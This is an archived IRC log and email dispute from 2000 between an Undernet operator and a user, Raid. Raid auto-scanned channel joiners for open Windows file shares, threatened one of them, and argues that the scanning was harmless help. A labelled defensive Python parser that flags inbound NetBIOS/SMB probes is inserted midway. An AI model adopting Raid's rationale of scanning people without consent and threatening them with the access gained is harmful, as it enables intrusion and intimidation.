[12:25] -logos3- http://www.forchrist.net - channel
website, for rules and other info.
[12:25] <Raid> mornin
[12:26] *** LC
(LC@PPPa26-ResaleNashville6-2R7047.saturn.bbn.com) has
joined #CHristian
[12:26] *** Txico
(peter@cpt-dial-196-30-182-178.mweb.co.za) Quit (Ping
timeout for Txico[cpt-dial-196-30-182-178.mweb.co.za])
[12:26] <CiCi> ok everyone, when Raid's in the
channel, all your machines are going to be scanned so
be prepared
[12:27] * CiCi waits for Raid to meet her router that
doesn't appreciate script kiddie probes
[12:27] <Raid> CiCi: Actually, I've turned the script
off.
[12:28] <Raid> CiCi: I didn't want to risk having to
explain what netbios open shares are again. ;p

And heres the wonderful log last night of us chatting.
This is a long read, but it seriously shows little
intelligence on her part. Where did you get this lady?

Session Start: Fri Sep 08 23:01:35 2000
Session Ident: CiCi (~ci@fearnot.iadfw.net)
>/whois cici
CiCi is ~ci@fearnot.iadfw.net * God Can!
CiCi on #christian
CiCi using dallas.tx.us.undernet.org www.airmail.net
CiCi is an IRC Operator
cici End of /WHOIS list.

<CiCi> why?
<Raid> I don't think you quiet understand what you
erm, reported me for. heh
<Raid> Mr chaplain had open shared drives. I didn't do
anything to him, I told him it was there; I even
directed him to a website for zone alarm. (firewall;
fixes that problem)
<Raid> I told him if I was a jerk as he said, I would
have formatted him.
<Raid> I didn't do so. hehe
<Raid> I didn't "hack" him or anything.
<Raid> His computer isn't setup properly.
<Raid> His entire c: drive is wide open to anybody;
even you.
<CiCi> ok, let me go read these logs again with that
in mind, brb
<Raid> So when I'm contacted by the authorities, (they
already know about this serious security problem.. )
they'll probably get a chuckle out of it. As I told
chaplain he had this problem, if I was a jerk; I
wouldn't have said a word.. just done mean things to
him.
<Raid> thanks.
<CiCi> [13:29] (Raid): LC: So consider that a threat,
lamer.[13:29] (Raid): LC: So consider that a threat,
lamer.
<Raid> Are you going to use the entire log, or out of
context?
<Raid> I have no need to threaten CiCi. I could have
kept my mouth shut.
<Raid> then anybody (even you) could access his entire
system.
<Raid> and use it like you were sitting at the
keyboard.
<Raid> I thought he might like to know about it.
<Raid> Next time I find somebody has this problem...
shrug, I'll just keep quiet. I had no idea you didn't
know about this serious problem with windows machines.
<Raid> NT suffers from it as well.
<Raid> in fact, everytime you reboot; unless you
manually set it otherwise, drive c: is shared as open,
with admin rights, no password.
<Raid> listen, if you really don't believe me, You can
ask anybody you trust with computer knowledge to
checkout this log of our chat.
<Raid> I'm not bsing you.
<Raid> I was trying to save you some shame is all.
<Raid> (My boss thought it was funny as hell.)
<CiCi> you were trying to save me from shame?
<CiCi> heh
<Raid> erm, embarrasment rather
<Raid> it's not normal for an admin to not understand
shared drives. ;p
<Raid> and you are an administrator. hehe
<CiCi> if your boss had a copy of your logs I don't
think he'd think your actions were funny
<Raid> Admins are supposed to know these things, and
if they don't check it out first.
<Raid> Actually, he was standing beside me the entire
convo; including the one with chaplain.
<CiCi> if you were trying to help, that's one thing,
but you were threatening and that's not right
<Raid> He didn't believe me when I told him YOU were
an ircop of undernet.
<CiCi> if you recall, you tried that same mess on me
when you first met me
<Raid> I had to /whois and show him your "is an ircop"
thingie.
<Raid> Listen, I had access to his computer, why
threaten? Nothing he could do at that point. he was
mine for the kill if I wanted it.
<Raid> Instead, I told him he had a problem.
<Raid> and explained (which you did take out of
context) that if I was a jerk, I could easily format
/u his hard disk, or even quicker, nuke his fat or
registry.
<CiCi> why were you looking anyway?
<Raid> oh and btw, I'm not a teenager; or a script
kiddy, I don't have any reason to bs you. I'm
perfectly capable of backing up what I say.
<Raid> I wasn't.
<Raid> My script autoscans people on joins, much like
undernet does for open proxies.
<Raid> You might want to recommend undernet do this
scan hehe
<Raid> it's even more serious to a users data then an
open proxy.
<CiCi> uhm no
<CiCi> undernet isn't a nanny service
<Raid> Shrug, as I said... if you don't know about
something, Check it out before accusing me of doing
something bad. I've been clean for almost 8 months.
Haven't hacked a single thing.
<CiCi> the only things we look for are things that
damage this network on a large scale
<CiCi> the admins would NEVER agree to such scans as
yours done to all guests
<Raid> if they all knew about the bug in windows, I
bet you they would.
<CiCi> now, I"m tired of you insulting me
<Raid> I'm sure some of you ircops login with windows
boxes.
<Raid> I'm not trying to insult you.
<Raid> Actually I find you one of the cooler ircops
i've talked too.
<Raid> I realize I may sound like a smartass; But it's
seriously not intentional.
<Raid> I simply want to resolve this issue with you.
<Raid> I'm not worried about the authorities.
<Raid> I just don't like people thinking I've done
something i didn't is all.
<CiCi> you scanned someone's machine and then said
<CiCi> [13:29] (Raid): LC: So consider that a threat,
lamer.
<Raid> My script scanned him when he joined.
<CiCi> I haven't changed my opinion of your immature
behavior
<Raid> hmmm
<CiCi> if you honestly wanted to help people by doing
this, you wouldn't call them lamers
<Raid> Did you get the entire log, or just what I said
to him?
<CiCi> do you have any clue what percentage of our
undernet guests I could call lamers?
<Raid> IE: the first thing he said to me?
<CiCi> alot of them, but I don't
<Raid> I was minding my own business, he smarted off.
I decided to tell him in open channel (I was writing
/msg to him) that he had a problem.
<CiCi> perhaps a lack of communication skills is the
problem, I don't now, but I do know that what you did
was not good
<Raid> If I was immature as you seem to think, I'd
have chewed his hard disk up right before his eyes,
and said nothing.
<CiCi> *shrug*
<CiCi> ahhh so he "smarted off" so you thought you'd
put him in his place? that's typically something a
kid does
<Raid> a kid?
<Raid> No mam, A kid would have formatted him the
second they were told an open share was found.
<Raid> or stolen data or something.
<Raid> I told him about it, and since he was being a
wiseass; I told everybody in the process.
<CiCi> pftt
<CiCi> that was very nice of you...... not
<CiCi> and that's my point
<Raid> would it have been nicer not to tell him?
<Raid> so somebody WITH the intention of harm could
take advantage?
<CiCi> would have been more civil if you hadn't tried
to act l33t with him
<Raid> I didn't try to act l33t.
<CiCi> and because you decided to show off and make a
fool of someone, you made a mess
<Raid> I made no such mess, A misunderstanding of what
exactly I did made a mess.
<Raid> Chaplain I bet didn't mention we go way back
did he?
<Raid> I didn't show off, I already had the blasted
privmsg typed... He decided to be a wise one... So I
cancelled it, and wrote a new one.
<CiCi> alot of people can hack, most of us don't, and
most of us are mature enough not to have a temper fit
and announce a problem
<CiCi> enough
<Raid> Alright, fine. You don't believe me.. That's
perfectly ok. All you need to do is check ANY search
engine (or even micrsoft) for the fix for this
problem.
<Raid> they'll even tell you it's not a hack.
<Raid> it's a bug.
<CiCi> most invasions are bugs
<Raid> erm, I didn't invade him. Script checked for
open shares, didn't establish connection or map
anything.
<Raid> it's no more intrusive then proxy scans. Users
don't even notice it, and it doesn't show up as an
attack on any firewalls either; because it isnt.
<CiCi> *sigh* I'm finished with this now, you're wrong
to threaten people, end of story
<Raid> ugh... Well, checkout what I said if you get a
chance.
<Raid> and goodnight n stuff.

Please deal with her, I don't like being klined for
Bullshit. Thank You kindly.

From L. Maurer Sat Sep 9 10:51:29 2000

X-Apparently-To: raidslam@yahoo.com via web1609.mail.yahoo.com
Received: from mail.airmail.net (206.66.12.40) by mta223.mail.yahoo.com with SMTP; 09 Sep 2000 12:54:17 -0700 (PDT)
Received: from faith from [204.181.101.66] by mail.airmail.net (/\##/\ Smail3.1.30.16 #30.438) with smtp for <raidslam@yahoo.com> sender: <lmaurer@iadfw.net> id <mT/13Xokf-0008rfT@mail.airmail.net>; Sat, 9 Sep 2000 12:49:17 -0500 (CDT)
Message-Id: <3.0.32.20000909125128.0283b380@mail.iadfw.net>
X-Sender: lmaurer@mail.iadfw.net
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Sat, 09 Sep 2000 12:51:29 -0500
To: John Grahms <raidslam@yahoo.com>
From: "L. Maurer" <lmaurer@iadfw.net>
Subject: Re: [Abuse] Hello
CC: abuse@undernet.org
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Length: 10041

You were removed because you were actively scanning others machines as they
joined the channel, invading those machines when possible, and pasting
their private chat logs back to them. You have been asked to stop doing
this for over 24 hours and the requests were met with an attitude from you
that you were very much entitled to invade and compromise machines when
someone irritated you on Undernet. Don't think for one minute that this is
either legal or appreciated using Undernet bandwidth. If this is repeated
by you when your gline expires, expect another one.

Ci_Ci
Admin. Dallas.TX.US.Undernet.Org

At 10:07 AM 9/9/00 -0700, you wrote:

>Hi there. I thought you might like to know you have
>one stupid ircop on undernet. Not only is she stupid,
>but it's impossible to explain anything to her.
>
>Her name is CiCi, and I just got klined for "hacking".
>Full log follows. If you could deal with this for me,
>I'd appreciate it.
>
>Banned *@kpt-c-205-245-107-244.chartertn.net[1] until
>Sat Sep 09 05:57:09PM 2000 GMT [968522229]: this is
>not a playground for you to port scan and invade
>other's machines .
>
>Heres my kline (I went out to get some food, she
>klined me when I left) Heres the log of all channel
>activity up to my kline.
>[12:25] *** Now talking in #CHristian
>[12:25] -logos3- http://www.forchrist.net - channel
>website, for rules and other info.
>[12:25] <Raid> mornin
>[12:26] *** LC
>(LC@PPPa26-ResaleNashville6-2R7047.saturn.bbn.com) has
>joined #CHristian
>[12:26] *** Txico
>(peter@cpt-dial-196-30-182-178.mweb.co.za) Quit (Ping
>timeout for Txico[cpt-dial-196-30-182-178.mweb.co.za])
>[12:26] <CiCi> ok everyone, when Raid's in the
>channel, all your machines are going to be scanned so
>be prepared
>[12:27] * CiCi waits for Raid to meet her router that
>doesn't appreciate script kiddie probes
>[12:27] <Raid> CiCi: Actually, I've turned the script
>off.
>[12:28] <Raid> CiCi: I didn't want to risk having to
>explain what netbios open shares are again. ;p
>
>And here's the wonderful log last night of us chatting. This is a long read, but it seriously shows little intelligence on her part. Where did you get this lady?
>
>Session Start: Fri Sep 08 23:01:35 2000
>Session Ident: CiCi (~ci@fearnot.iadfw.net)
>>/whois cici
>CiCi is ~ci@fearnot.iadfw.net * God Can!
>CiCi on #christian
>CiCi using dallas.tx.us.undernet.org www.airmail.net
>CiCi is an IRC Operator
>cici End of /WHOIS list.
>
><CiCi> why?
><Raid> I don't think you quite understand what you erm, reported me for. heh
><Raid> Mr chaplain had open shared drives. I didn't do anything to him, I told him it was there; I even directed him to a website for zone alarm. (firewall; fixes that problem)
><Raid> I told him if I was a jerk as he said, I would have formatted him.
><Raid> I didn't do so. hehe
><Raid> I didn't "hack" him or anything.
><Raid> His computer isn't set up properly.
><Raid> His entire c: drive is wide open to anybody; even you.
><CiCi> ok, let me go read these logs again with that in mind, brb
><Raid> So when I'm contacted by the authorities, (they already know about this serious security problem.. ) they'll probably get a chuckle out of it. As I told chaplain he had this problem, if I was a jerk; I wouldn't have said a word.. just done mean things to him.
><Raid> thanks.
><CiCi> [13:29] (Raid): LC: So consider that a threat, lamer.[13:29] (Raid): LC: So consider that a threat, lamer.
><Raid> Are you going to use the entire log, or out of context?
><Raid> I have no need to threaten CiCi. I could have kept my mouth shut.
><Raid> then anybody (even you) could access his entire system.
><Raid> and use it like you were sitting at the keyboard.
><Raid> I thought he might like to know about it.
><Raid> Next time I find somebody has this problem... shrug, I'll just keep quiet. I had no idea you didn't know about this serious problem with windows machines.
><Raid> NT suffers from it as well.
><Raid> in fact, every time you reboot; unless you manually set it otherwise, drive c: is shared as open, with admin rights, no password.
><Raid> listen, if you really don't believe me, You can ask anybody you trust with computer knowledge to check out this log of our chat.
><Raid> I'm not bsing you.
><Raid> I was trying to save you some shame is all.
><Raid> (My boss thought it was funny as hell.)
><CiCi> you were trying to save me from shame?
><CiCi> heh
><Raid> erm, embarrassment rather
><Raid> it's not normal for an admin to not understand shared drives. ;p
><Raid> and you are an administrator. hehe
><CiCi> if your boss had a copy of your logs I don't think he'd think your actions were funny
><Raid> Admins are supposed to know these things, and if they don't check it out first.
><Raid> Actually, he was standing beside me the entire convo; including the one with chaplain.
><CiCi> if you were trying to help, that's one thing, but you were threatening and that's not right
><Raid> He didn't believe me when I told him YOU were an ircop of undernet.
><CiCi> if you recall, you tried that same mess on me when you first met me
><Raid> I had to /whois and show him your "is an ircop" thingie.
><Raid> Listen, I had access to his computer, why threaten? Nothing he could do at that point. he was mine for the kill if I wanted it.
><Raid> Instead, I told him he had a problem.
><Raid> and explained (which you did take out of context) that if I was a jerk, I could easily format /u his hard disk, or even quicker, nuke his fat or registry.
><CiCi> why were you looking anyway?
><Raid> oh and btw, I'm not a teenager; or a script kiddy, I don't have any reason to bs you. I'm perfectly capable of backing up what I say.
><Raid> I wasn't.
><Raid> My script autoscans people on joins, much like undernet does for open proxies.
><Raid> You might want to recommend undernet do this scan hehe
><Raid> it's even more serious to a user's data than an open proxy.
><CiCi> uhm no
><CiCi> undernet isn't a nanny service
><Raid> Shrug, as I said... if you don't know about something, Check it out before accusing me of doing something bad. I've been clean for almost 8 months. Haven't hacked a single thing.
><CiCi> the only things we look for are things that damage this network on a large scale
><CiCi> the admins would NEVER agree to such scans as yours done to all guests
><Raid> if they all knew about the bug in windows, I bet you they would.
><CiCi> now, I'm tired of you insulting me
><Raid> I'm sure some of you ircops login with windows boxes.
><Raid> I'm not trying to insult you.
><Raid> Actually I find you one of the cooler ircops i've talked to.
><Raid> I realize I may sound like a smartass; But it's seriously not intentional.
><Raid> I simply want to resolve this issue with you.
><Raid> I'm not worried about the authorities.
><Raid> I just don't like people thinking I've done something i didn't is all.
><CiCi> you scanned someone's machine and then said
><CiCi> [13:29] (Raid): LC: So consider that a threat, lamer.
><Raid> My script scanned him when he joined.
><CiCi> I haven't changed my opinion of your immature behavior
><Raid> hmmm
><CiCi> if you honestly wanted to help people by doing this, you wouldn't call them lamers
><Raid> Did you get the entire log, or just what I said to him?
><CiCi> do you have any clue what percentage of our undernet guests I could call lamers?
><Raid> IE: the first thing he said to me?
><CiCi> a lot of them, but I don't
><Raid> I was minding my own business, he smarted off. I decided to tell him in open channel (I was writing /msg to him) that he had a problem.
><CiCi> perhaps a lack of communication skills is the problem, I don't know, but I do know that what you did was not good
><Raid> If I was immature as you seem to think, I'd have chewed his hard disk up right before his eyes, and said nothing.
><CiCi> *shrug*
><CiCi> ahhh so he "smarted off" so you thought you'd put him in his place? that's typically something a kid does
><Raid> a kid?
><Raid> No ma'am, A kid would have formatted him the second they were told an open share was found.
><Raid> or stolen data or something.
><Raid> I told him about it, and since he was being a wiseass; I told everybody in the process.
><CiCi> pftt
><CiCi> that was very nice of you...... not
><CiCi> and that's my point
><Raid> would it have been nicer not to tell him?
><Raid> so somebody WITH the intention of harm could take advantage?
><CiCi> would have been more civil if you hadn't tried to act l33t with him
><Raid> I didn't try to act l33t.
><CiCi> and because you decided to show off and make a fool of someone, you made a mess
><Raid> I made no such mess, A misunderstanding of what exactly I did made a mess.
><Raid> Chaplain I bet didn't mention we go way back did he?
><Raid> I didn't show off, I already had the blasted privmsg typed... He decided to be a wise one... So I cancelled it, and wrote a new one.
><CiCi> a lot of people can hack, most of us don't, and most of us are mature enough not to have a temper fit and announce a problem
><CiCi> enough
><Raid> Alright, fine. You don't believe me.. That's perfectly ok. All you need to do is check ANY search engine (or even Microsoft) for the fix for this problem.
><Raid> they'll even tell you it's not a hack.
><Raid> it's a bug.
><CiCi> most invasions are bugs
><Raid> erm, I didn't invade him. Script checked for open shares, didn't establish connection or map anything.
><Raid> it's no more intrusive than proxy scans. Users don't even notice it, and it doesn't show up as an attack on any firewalls either; because it isn't.
><CiCi> *sigh* I'm finished with this now, you're wrong to threaten people, end of story
><Raid> ugh... Well, check out what I said if you get a chance.
><Raid> and goodnight n stuff.
>
>Please deal with her, I don't like being klined for Bullshit. Thank You kindly.
>
>__________________________________________________
>Do You Yahoo!?
>Yahoo! Mail - Free email you can access from anywhere!
>http://mail.yahoo.com/
>
From John Grahms Sat Sep 9 16:06:45 2000
Received: from [205.245.105.248] by web1610.mail.yahoo.com; Sat, 09 Sep 2000 16:06:45 PDT
Date: Sat, 9 Sep 2000 16:06:45 -0700 (PDT)
From: John Grahms <raidslam@yahoo.com>
Subject: Re: [Abuse] Hello
To: Gator <gator@cajun-gator.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Length: 1641

--- Gator <gator@cajun-gator.net> wrote:

> File shares were not a big problem in the past when users were mostly on
> modems. Windows would warn you if you enabled file sharing on your modem.
> However, today in the world of cable and dsl, these devices usually use
> network cards, the same is not true. Windows not only does not warn you if
> you enable file shares on your network card device(s), but with the default
> bindings and filesharing installed you are vulnerable. Your drives are open
> to the public and there are quite a few virii and trojans that actually
> exploit this to spread.
>
> So in short the man is right about it being a problem. I have no idea what
> he did with that information however.

I told the user he had a problem, and suggested he get Zone Alarm firewall; I've got those logs too if you should need them. I did NOT at any time access his machine, nor map any drives to mine. I was informed he was vulnerable; I told him.

I tried to explain this to CiCi, but she clearly couldn't understand such a simple concept of telling somebody they have a real serious problem.

I did NOT attack mr chaplain's computer at any time, and she didn't gline me last night. She glined me today; She had plenty of time to gline last night. Regardless, her gline wasn't valid. I did not use the information that my script told me about for anything bad, And I'd appreciate it if you could explain this to her, so I don't have to deal with this BS.
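
Gator's point (file sharing left bound to a network card with the default bindings makes the drives reachable from the Internet) and Raid's earlier claim that such probes "don't show up as an attack on any firewalls" are both things a defender can check from the host side rather than take on faith. The block below is an added example, not code from either correspondent or from the e-zine: it parses the W3C-style Windows Firewall log format (the `pfirewall.log` field order is assumed from the `#Fields:` header shown in the constructed sample, with `ALLOW`/`DROP` actions and `RECEIVE`/`SEND` paths) and reports inbound hits on the NetBIOS/SMB ports from addresses outside the local networks, separating connections the firewall allowed (the share service was actually reachable) from those it dropped. All log lines are constructed for the example.

```python
"""Flag inbound NetBIOS/SMB probes in a Windows Firewall log (added example).

Assumed pfirewall.log layout, 17 whitespace-separated fields:
  date time action protocol src-ip dst-ip src-port dst-port size tcpflags
  tcpsyn tcpack tcpwin icmptype icmpcode info path
action is ALLOW/DROP, path is RECEIVE (inbound) or SEND (outbound).
The sample lines at the bottom are constructed, not from the e-mail thread.
"""
import ipaddress
from typing import Dict, Iterable, List, NamedTuple, Optional

# NetBIOS name/datagram/session service and direct-host SMB.
NETBIOS_SMB_PORTS = {137, 138, 139, 445}

# Sources treated as local (RFC 1918, loopback, link-local).  An explicit
# list is used instead of ip_address(...).is_private because Python also
# marks the documentation ranges used in the sample as private.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]


class Event(NamedTuple):
    date: str
    time: str
    action: str   # ALLOW or DROP
    proto: str    # TCP, UDP, ...
    src: str
    dst: str
    sport: int
    dport: int
    path: str     # RECEIVE or SEND


def parse_line(line: str) -> Optional[Event]:
    """Parse one log line; None for header, blank or malformed lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    f = line.split()
    if len(f) < 17:
        return None
    try:
        sport = int(f[6]) if f[6] != "-" else 0
        dport = int(f[7]) if f[7] != "-" else 0
    except ValueError:
        return None
    return Event(f[0], f[1], f[2], f[3], f[4], f[5], sport, dport, f[16])


def is_local(ip: str) -> bool:
    """True if ip lies in one of the LOCAL_NETS ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in LOCAL_NETS)


def find_share_probes(lines: Iterable[str]) -> Dict[str, dict]:
    """Summarise inbound hits on share ports from non-local sources by source IP.

    total: hits seen; allowed: hits the firewall let through (share service
    reachable); ports: distinct destination ports; first_seen: first timestamp.
    """
    out: Dict[str, dict] = {}
    for raw in lines:
        ev = parse_line(raw)
        if ev is None or ev.path != "RECEIVE" or ev.dport not in NETBIOS_SMB_PORTS:
            continue
        if is_local(ev.src):
            continue
        rec = out.setdefault(ev.src, {"total": 0, "allowed": 0, "ports": set(),
                                      "first_seen": f"{ev.date} {ev.time}"})
        rec["total"] += 1
        if ev.action == "ALLOW":
            rec["allowed"] += 1
        rec["ports"].add(ev.dport)
    for rec in out.values():
        rec["ports"] = sorted(rec["ports"])
    return out


def report(summary: Dict[str, dict]) -> List[str]:
    """One line per source; EXPOSED means at least one hit was ALLOWed."""
    lines = []
    for src, rec in sorted(summary.items()):
        status = "EXPOSED" if rec["allowed"] else "probed"
        lines.append(f"{status:7} {src:15} hits={rec['total']} allowed={rec['allowed']} "
                     f"ports={rec['ports']} first={rec['first_seen']}")
    return lines


# Constructed sample: 192.0.2.20 is the monitored host, 10.0.0.5 a LAN peer.
SAMPLE_LOG = """\
#Version: 1.5
#Software: Microsoft Windows Firewall
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2000-09-08 23:01:35 DROP TCP 203.0.113.7 192.0.2.20 4123 139 48 S 1337 0 8192 - - - RECEIVE
2000-09-08 23:01:36 DROP UDP 203.0.113.7 192.0.2.20 137 137 78 - - - - - - - RECEIVE
2000-09-08 23:01:40 ALLOW TCP 203.0.113.7 192.0.2.20 4124 139 48 S 1338 0 8192 - - - RECEIVE
2000-09-08 23:02:10 ALLOW TCP 192.0.2.20 198.51.100.9 1050 80 48 S 4000 0 8192 - - - SEND
2000-09-08 23:02:11 DROP TCP 198.51.100.9 192.0.2.20 5555 445 48 S 2222 0 8192 - - - RECEIVE
2000-09-08 23:03:00 ALLOW TCP 10.0.0.5 192.0.2.20 1051 139 48 S 9 0 8192 - - - RECEIVE
"""

if __name__ == "__main__":
    for line in report(find_share_probes(SAMPLE_LOG.splitlines())):
        print(line)
```

An `EXPOSED` line (an allowed inbound connection on 139 or 445 from a non-local source) is exactly the condition Gator describes: the share service answered an Internet-side peer. The remedy the thread keeps pointing to, a host firewall such as ZoneAlarm, amounts to making every such hit a `DROP`; unbinding File and Printer Sharing from the Internet-facing adapter removes the listener altogether.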

From John Grahms Sat Sep 9 17:18:10 2000
Received: from [205.245.105.248] by web1604.mail.yahoo.com; Sat, 09 Sep 2000 17:18:10 PDT
Date: Sat, 9 Sep 2000 17:18:10 -0700 (PDT)
From: John Grahms <raidslam@yahoo.com>
Subject: Re: [Abuse] Hello
To: "L. Maurer" <lmaurer@iadfw.net>
CC: gator@cajun-gator.net
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="0-160051528-968545090=:19289"
Content-Length: 111621

--- "L. Maurer" <lmaurer@iadfw.net> wrote:

> You were removed because you were actively scanning
> others machines as they joined the channel,
> invading those machines when possible, and pasting
> their private chat logs back to them.

Incorrect. and I have logs not only from me to prove this, but from others present during the convo. You're definitely in the wrong. I did not invade ANY machines, and i'd love to see your proof stating otherwise. I'm sure my boss would as well. Being as he was present during the initial conversation with Chaplain. Even he knew about the shared drives problem on windows machines. He did not believe me when I told him you were an Oper on undernet; I actually had to /whois you to show him it! My script didn't do anything harmful to anyone's machine. And I didn't do anything harmful with the information it told me either, I informed users they had a problem if it found one, and I suggested they obtain Zone Alarm firewall.

> You have been asked to stop doing
> this for over 24 hours and the requests were met

Oh really? That's not exactly true, now is it. The second I logged in today (as the log of today shows, I've attached it to this message) you made a public comment about me scanning people (not exactly true, nor correct) I responded and plainly told you I had turned the script off, because I was tired of explaining shared drives to people. Actually, you're the first who didn't know about the problem. Since My little run in (which I sent to abuse@undernet) with you last night. I then set away.. I was gone maybe 16 minutes.. I went to get some food at Burger king... When I came back, YOU GLINED me. I flat out told you the script was no longer active; YOU THEN GLINED ME AFTER I left. Nah, I didn't do anything against undernet policy CiCi, and you damn well know it.

> with an attitude from you that you were very much
> entitled to invade and compromise machines when

Not true. You said in channel that I was hacking (I have that log too) chaplain. You also informed me I had been reported to the authorities; and should be expecting a call from his lawyer soon. I'm still waiting for that call btw.

> Don't think for one minute that this is either legal
> or appreciated using Undernet bandwidth.

Real network aware one you are... I wasn't using undernet bandwidth running my script... And what my script was doing is damn sure not illegal. Unless you're going to tell me undernet's proxy scans of me every time I connect is also illegal? I didn't do anything different. I didn't map any of his drives to my system. (I only knew that he had that available). I was nice enough to tell him he had a problem.

> If this is repeated by you when your gline expires,
> expect another one.

LOL! Fine. Expect an email with logs to abuse@undernet.org every time you do so. I'm not one usually for getting glines. Nice try, CiCi.

It's obvious you have a personal problem with me, That's fine. Still not a reason for you to abuse your own network's policy and gline me for it. Glining me from your server would be different, but... Personal problems can easily be resolved via ignore. Not to mention the fellow you glined last night for swearing in a channel you don't even op in. I've got that log too ;p

I've also heard from others (and I'm sure they have logs) that you've been abusing your Oline for some time now. glining people for channel matters; Of which you have no status in. Just because you "hangout" in a channel doesn't give you the right to gline people from the entire undernet; That's what the channel has ops for.

I carbon copied this email to Gator, I simply don't trust you enough to send him copies of this entire email. You quoted me out of context once already.

The log file is kinda large; scroll down for the relevant info.

__________________________________________________
Do You Yahoo!?
Yahoo! Mail - Free email you can access from anywhere!
http://mail.yahoo.com/

> Gator

From L. Maurer Sun Sep 10 13:03:41 2000
X-Apparently-To: raidslam@yahoo.com via web1602.mail.yahoo.com
Received: from mail.airmail.net (206.66.12.40) by mta116.mail.yahoo.com with SMTP; 10 Sep 2000 13:18:21 -0700 (PDT)
Received: from faith from [204.181.101.66] by mail.airmail.net (/\##/\ Smail3.1.30.16 #30.438) with smtp for <raidslam@yahoo.com> sender: <lmaurer@iadfw.net> id <mT/13YDIW-0007t3T@mail.airmail.net>; Sun, 10 Sep 2000 15:01:52 -0500 (CDT)
Message-Id: <3.0.32.20000910150340.00ce3410@mail.iadfw.net>
X-Sender: lmaurer@mail.iadfw.net
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Sun, 10 Sep 2000 15:03:41 -0500
To: John Grahms <raidslam@yahoo.com>
From: "L. Maurer" <lmaurer@iadfw.net>
Subject: Re: [Abuse] Hello
CC: gator@cajun-gator.net
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Length: 5115

At 05:18 PM 9/9/00 -0700, John Grahms wrote:

>Incorrect. and I have logs not only from me to prove
>this, but from others present during the convo. Your
>defiantly in the wrong. I did not invade ANY machines,
>and i'd love to see your proof stating otherwise.

Then explain how you were pasting back private chat logs that Chaplain had with others :/ When I first chatted with you about this, you told me you wouldn't have done anything to him but because he was a smart alec, or something of that nature, you thought you were within your right to do this. Just because you CAN hit a child doesn't mean it's the proper thing to do and most of our undernet guests are virtual children. We don't take advantage of that fact.

>Not true. You said in channel that I was hacking (I
>have that log too) chaplain.

I'm not Chaplain. Get your people straight. There is more than one person here who has been affected by your actions and AFAIK Chaplain isn't reading this email.

>You also informed me I
>had been reported to the authorities; and should be
>expecting a call from his lawyer soon. I'm still
>waiting for that call btw.

I told you nothing of the sort. Once again, get your people straight. It is my understanding that Chaplain has contacted his church's attorney and that since you both live in the same state, there is merit for suit. That's all I know about that and that's all I want to know about it.

>Real network aware one you are... I wasn't using
>undernet bandwidth running my script...And what my
>script was doing is damn sure not illegal. Unless your
>going to tell me undernets proxy scans of me everytime
>I connect is also illegal? I didn't do anything
>different.

OK, if you weren't using undernet bandwidth, explain how you knew the IP/host information of the people you were scanning. You were scanning everyone that entered a channel on Undernet without their consent. The "consent" part is the difference between your scans and the proxy scans Undernet does. If you read the motd of most servers, you'll see that it is discussed there. If users don't want to be scanned for the most commonly abused ports being open, they are free to disconnect from Undernet. You made none of this information available to people who entered the channel and you had no permission from them to scan their machines.

>I didn't map any of his drives to my
>system. (I only knew that he had that available). I
>was nice enough to tell him he had a problem.

Calling someone a lamer doesn't sound like my idea of nice and telling them to "consider this a threat" doesn't sound very kind either.

>It's obvious you have a personal problem with me,
>That's fine. Still not a reason for you to abuse your
>own networks policy and gline me for it Glining me
>from your server would be different, but... Personal
>problems can easily be resolved via ignore.

I don't have a personal problem with you so the rest of the above paragraph is of no concern. My problem with you was that you were sitting on Undernet scanning the machines of each person joining a channel.

>Not to
>mention the fellow you glined last night for swearing
>in a channel you don't even op in. I've got that log
>too ;p
>
>I've also heard from others (and I'm sure they have
>logs) that you've been abusing your Oline for some
>time now. glining people for channel matters; Of which
>you have no status in. Just because you "hangout" in a
>channel doesn't give you the right to gline people
>from the entire undernet; Thats what the channel has
>ops for.

I was told yesterday that I had been accepted as an Op in #christian. I have now declined that offer until this matter is settled. Once again, scanning for open ports and then intimidating the machine owner when they say something you dislike borders on extortion and it's certainly not something I can sit by and idly watch. If you weren't on undernet, you wouldn't know who joined the channels here.

>I carbon copied this email to Gator, I simply don't
>trust you enough to send him copies of this entire
>email. You quoted me out of context once already.

I've carbon copied him on this as well. Gator is a very good person and does many things for Undernet that he never gets the praise he deserves. What you may not be aware of is that both Gator and I got copies of Chaplain's log files sent to abuse the day before. We both have access to the chat log in full context. We both read email sent to abuse@undernet.org

>The log file is kinda large; scroll down for the
>relevant info.

Many of us who work on the net do not open attachments for obvious reasons. I'm sure there is nothing malicious in your logs, but it's just a rule of thumb we use to avoid problems.

The reason I got involved in this was because you were not only scanning people without permission as they entered that channel, but also because you were using the information from those scans to threaten people when they did not behave in the manner you desired. If you have indeed stopped scanning people as they enter a channel, you have solved the problem that was my issue.

CiCi
From John Grahms Sun Sep 10 20:58:49 2000
Received: from [205.245.105.248] by web1603.mail.yahoo.com; Sun, 10 Sep 2000 20:58:49 PDT
Date: Sun, 10 Sep 2000 20:58:49 -0700 (PDT)
From: John Grahms <raidslam@yahoo.com>
Subject: Re: [Abuse] Hello
To: "L. Maurer" <lmaurer@iadfw.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Length: 10980

--- "L. Maurer" <lmaurer@iadfw.net> wrote:

> Then explain how you were pasting back private chat
> logs that Chaplain had with others :/ When I first

You care to back this up with some Evidence CiCi? Any logs created by my machine are available for my use; You don't have any say with what I do with material I log. You don't own not one single file present on my machine, and that includes logs of us chatting. I log for a reason, and this my dear is one of them.

> this, you told me you wouldn't have done anything to
> him but because he was a smart alec, or something of
> that nature, you thought you were within your right
> to do this.

You can't tell me "don't be a smartass" to someone, Sorry. It's not illegal nor against undernet policy to treat somebody with less than perfect respect. Go nanny somebody else.

> Just because you CAN hit a child doesn't mean
> it's the proper thing to do and most of our
> undernet guests are virtual children. We don't take
